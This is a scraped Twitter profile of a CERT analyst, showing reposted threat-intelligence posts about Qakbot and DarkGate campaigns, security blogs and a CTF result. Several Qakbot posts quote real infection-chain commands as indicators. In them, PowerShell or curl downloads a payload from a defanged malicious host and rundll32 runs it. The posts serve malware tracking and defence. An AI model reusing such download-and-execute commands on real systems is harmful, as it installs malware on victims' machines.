Security Boi (@0x49736b) 's Twitter Profile
Security Boi

@0x49736b

CERT Analyst ~ BleuBytes

ID: 941954338074873856

calendar_today16-12-2017 08:53:09

444 Tweet

180 Followers

275 Following

proxylife (@pr0xylife) 's Twitter Profile Photo

#Qakbot - azd - .zip > .wsf > (decoy .pdf) > .dll WScript.exe Adobe Cloud Certificate 133337.wsf rundll32.exe C:\ProgramData\Z6x9E9.SmcisaK,Wind Samples 👇 bazaar.abuse.ch/sample/1b3b1a8… bazaar.abuse.ch/sample/e99726f… IOC's github.com/pr0xylife/Qakb…

#Qakbot - azd - .zip > .wsf > (decoy .pdf) > .dll

WScript.exe Adobe Cloud Certificate 133337.wsf

rundll32.exe C:\ProgramData\Z6x9E9.SmcisaK,Wind

Samples 👇

bazaar.abuse.ch/sample/1b3b1a8…

bazaar.abuse.ch/sample/e99726f…

IOC's
github.com/pr0xylife/Qakb…
proxylife (@pr0xylife) 's Twitter Profile Photo

#Qakbot - tok01 - .one > .ps > .dll > (decoy .pdf) cmd.exe /c ngops.bat poweRshell -C iwr http://waojernote.]com/images/1.gif -o C:\ProgramData\lesian.dat poweRshell -C Start-Sleep 12 rundll32 C:\ProgramData\lesian.dat,Wind IOC's github.com/pr0xylife/Qakb…

#Qakbot - tok01 - .one > .ps  > .dll > (decoy .pdf)

cmd.exe /c ngops.bat

poweRshell -C iwr http://waojernote.]com/images/1.gif -o C:\ProgramData\lesian.dat

poweRshell -C Start-Sleep 12

rundll32 C:\ProgramData\lesian.dat,Wind

IOC's
github.com/pr0xylife/Qakb…
proxylife (@pr0xylife) 's Twitter Profile Photo

#Qakbot - BB15 - .one > .jse > .bat > .ps > .dll WScript.exe Open.jse cmd.exe /c default.bat powershell iwr -uri http://104.236.1.43/YXF/150223.gif -o %temp%\aTgzWLspf.tmp RunDLL32 %temp%\aTgzWLspf.tmp,Wind IOC's github.com/pr0xylife/Qakb…

#Qakbot - BB15 - .one > .jse > .bat > .ps > .dll

WScript.exe Open.jse

cmd.exe /c default.bat

powershell iwr -uri http://104.236.1.43/YXF/150223.gif -o %temp%\aTgzWLspf.tmp

RunDLL32 %temp%\aTgzWLspf.tmp,Wind

IOC's
github.com/pr0xylife/Qakb…
proxylife (@pr0xylife) 's Twitter Profile Photo

#Qakbot - tok01 - .one > .wsf > .cmd > ps > .dll WScript.exe Open.wsf cmd.exe /c r.cmd poweRshell.exe -C iwr http://baracundofres.]com/images/150223.gif -OutFile rei.dat poweRshell.exe -C Start-Sleep 11 rundll32.exe rei.dat,Wind IOC's github.com/pr0xylife/Qakb…

#Qakbot - tok01 - .one > .wsf  > .cmd >  ps > .dll

WScript.exe Open.wsf

cmd.exe /c r.cmd

poweRshell.exe -C iwr http://baracundofres.]com/images/150223.gif -OutFile rei.dat

poweRshell.exe -C Start-Sleep 11

rundll32.exe rei.dat,Wind

IOC's
github.com/pr0xylife/Qakb…
ExecuteMalware (@executemalware) 's Twitter Profile Photo

Again today, I received emails leading to an (as yet, still) unidentified #malware sample. Pretty heavily obfuscated scripts - fun puzzles. Here's what I saw: github.com/executemalware…

Again today, I received emails leading to an (as yet, still) unidentified #malware sample. Pretty heavily obfuscated scripts - fun puzzles.

Here's what I saw:
github.com/executemalware…
proxylife (@pr0xylife) 's Twitter Profile Photo

#Qakbot - BB15 - .one > .wsf > curl > .dll wscript.exe mikey.wsf cmd.exe /c curl -o fd.dll http://64.225.8.]202/1Moch7/160223 && rundll32 fd.dll,N115 Samples 👇 bazaar.abuse.ch/sample/f836077… bazaar.abuse.ch/sample/6f99171… IOC's github.com/pr0xylife/Qakb…

#Qakbot - BB15 - .one > .wsf > curl > .dll

wscript.exe mikey.wsf

cmd.exe /c curl -o fd.dll http://64.225.8.]202/1Moch7/160223 && rundll32 fd.dll,N115

Samples 👇

bazaar.abuse.ch/sample/f836077…

bazaar.abuse.ch/sample/6f99171…

IOC's
github.com/pr0xylife/Qakb…
Botconf (@botconf) 's Twitter Profile Photo

The #Botconf2024 CFP is now available (sorry for the little delay) and the deadline is the same: 1st December 2023. botconf.eu/call-for-propo…

The #Botconf2024 CFP is now available (sorry for the little delay) and the deadline is the same: 1st December 2023.
botconf.eu/call-for-propo…
Team Cymru Threat Research (@teamcymru_s2) 's Twitter Profile Photo

#QakBot's summer break through the lens of NetFlow data The attached image charts traffic volumes from QakBot C2s to their upstream Tier 2 servers located in #Russia Based on our visibility, things began to go quiet after 2 June (spamming ceased later) ☀️🍹🏖️ #PureSignal #PTO

#QakBot's summer break through the lens of NetFlow data

The attached image charts traffic volumes from QakBot C2s to their upstream Tier 2 servers located in #Russia 

Based on our visibility, things began to go quiet after 2 June (spamming ceased later) ☀️🍹🏖️

#PureSignal #PTO
Team Cymru Threat Research (@teamcymru_s2) 's Twitter Profile Photo

BLOG POST: Part 2 of our high-level tracking of #QakBot infrastructure. Characterising #C2 servers and their relationship with the upstream hosts (located in 🇷🇺) used to manage them. team-cymru.com/post/visualizi…

proxylife (@pr0xylife) 's Twitter Profile Photo

#TA577 - Back on the scene pushing #Darkgate Time to resume tracking operations, welcome back Tramp. Distro 👇 url > zip > lnk url > xll pdf > url > xll > msi Samples 👇 bazaar.abuse.ch/sample/026f4c9… bazaar.abuse.ch/sample/2eee7af… bazaar.abuse.ch/sample/bb2434f… bazaar.abuse.ch/sample/5bc060b…

Greg Lesnewich (@greglesnewich) 's Twitter Profile Photo

The whole gang got up for this one to wrap up on TA422 (aka APT28, Fancy Bear, Forest Blizzard, FROZENLAKE, BlueDelta, Sednit, etc.) spraying n-day exploits August through November proofpoint.com/us/blog/threat… TL,DR:

The whole gang got up for this one to wrap up on TA422 (aka APT28, Fancy Bear, Forest Blizzard, FROZENLAKE, BlueDelta, Sednit, etc.) spraying n-day exploits August through November 

proofpoint.com/us/blog/threat…

TL,DR:
Zeroed (@zeroedtech) 's Twitter Profile Photo

How much do you know about IIS Machine Keys and View State? Are you confident you could not only identify an exploited host but also remediate it? If not, check out my new blog post which covers exploitation, detection and remediation zeroed.tech/blog/viewstate…

Seika.io (@seika_io) 's Twitter Profile Photo

Seika.io is now in open beta. 🚀 We're a new internet listener aiming at providing threat intelligence context thanks to our sensors around the globe. seika.io/blog/2024/08/l…

DFIR-IRIS (@dfir_iris) 's Twitter Profile Photo

🎉 IRIS 2.4.12 is out now, bringing a shiny new module for Seika.io, enhanced webhook capabilities, spelling in editors! 🚀 Check it out here: docs.dfir-iris.org/2.4.12/changel… and Seika.io

John Breth (JB) | CyberInsight® on YouTube (@jbizzle703) 's Twitter Profile Photo

Give this a look, it’s called GHOSTS, it allows you to simulate/automate different types of user traffic/activities. Normally used cybersecurity testing, it might work for what you need. github.com/cmu-sei/GHOSTS

The DFIR Report (@thedfirreport) 's Twitter Profile Photo

🎉 DFIR Labs CTF Winners🎉 We’re thrilled to announce the winners of our latest CTF: 🏆 1st Place: Security Boi 🥈 2nd Place: Satyender Yadav 🥉 3rd Place: p500 A big thank you to all participants and supporters for making this event a success!

🎉 DFIR Labs CTF Winners🎉
 
We’re thrilled to announce the winners of our latest CTF:
 
🏆 1st Place: <a href="/0x49736b/">Security Boi</a>
🥈 2nd Place: <a href="/thedeadthinker/">Satyender Yadav</a>
🥉 3rd Place: p500
 
A big thank you to all participants and supporters for making this event a success!
watchTowr (@watchtowrcyber) 's Twitter Profile Photo

Expression payloads meet mayhem in this week's Ivanti EPMM vulnerabilities — CVE-2025-4427 and CVE-2025-4428 — chained to achieve unauth RCE. Beware - this is currently being exploited ITW! Enjoy our analysis. labs.watchtowr.com/expression-pay…